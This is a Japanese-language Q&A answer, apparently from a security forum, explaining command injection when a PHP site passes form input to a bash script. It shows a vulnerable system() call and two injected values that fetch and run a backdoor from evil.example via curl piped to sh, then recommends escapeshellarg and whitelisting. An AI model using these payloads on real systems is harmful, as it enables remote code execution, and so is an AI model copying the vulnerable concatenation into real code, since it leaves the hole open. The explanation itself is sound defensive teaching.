サイトダイアログボックスから引数をとるbashスクリプトを実行するのは良い考えですか？

問題

まず、あなたはこれを行うことの危険性について尋ねました。このような機能を適切に実装しないと、 コマンドインジェクション と呼ばれる重大な脆弱性が発生し、攻撃者が任意のシェルコマンドを実行できる可能性があります。

私はあなたのウェブサイトがどの言語/フレームワークを使用しているかはわかりませんが、それがPHPであり、PHP次のようなコードがあるとします。

_system("/usr/local/bin/my_custom_bash_script -p " . $_POST["playlist_id"]);
_

このコードは、ユーザーから送信された値（プレイリストID）を受け取り、それを別の文字列と連結して、通常_/bin/sh -c_に渡されるシェルコマンドを実行します。送信されたプレイリストIDが次のようになっているかどうかを検討します。

_; curl https://evil.example/install_backdoor | sh
_

または

_<some_playlist_id>$(curl https://evil.example/install_backdoor | sh)
_

前者の場合、セミコロンは、後続のコマンドを別のコマンドとして実行する必要があることをシェルに伝えます。 2番目のケースでは、$(...)はシェルにコンテンツをサブシェルで実行するように指示します。これらのシナリオで悪意に使用できるシェルが解釈するさまざまな特殊文字があります（例：_|_、_||_、_&&_、_``_など）。

緩和

たとえば、PHPには escapeshellarg があり、これはこの目的のためのものです。これにより、渡されたものはすべてシェルに渡されたときに1つの引数としてのみ扱われるようになります。使用している言語に応じて、これと同等のものがあるはずです。または、他の回答が述べたように、正規表現を使用して安全な文字をホワイトリストに登録することもできます。

スクリプトが他のスクリプトを呼び出しているため、2次（またはn次）コマンドインジェクションの脆弱性にも注意する必要があります。実行するスクリプトのいずれも、完全に検証されていない限り、信頼できないデータでevalまたはsystemのような関数を使用していないことを確認してください。まったく呼び出されません。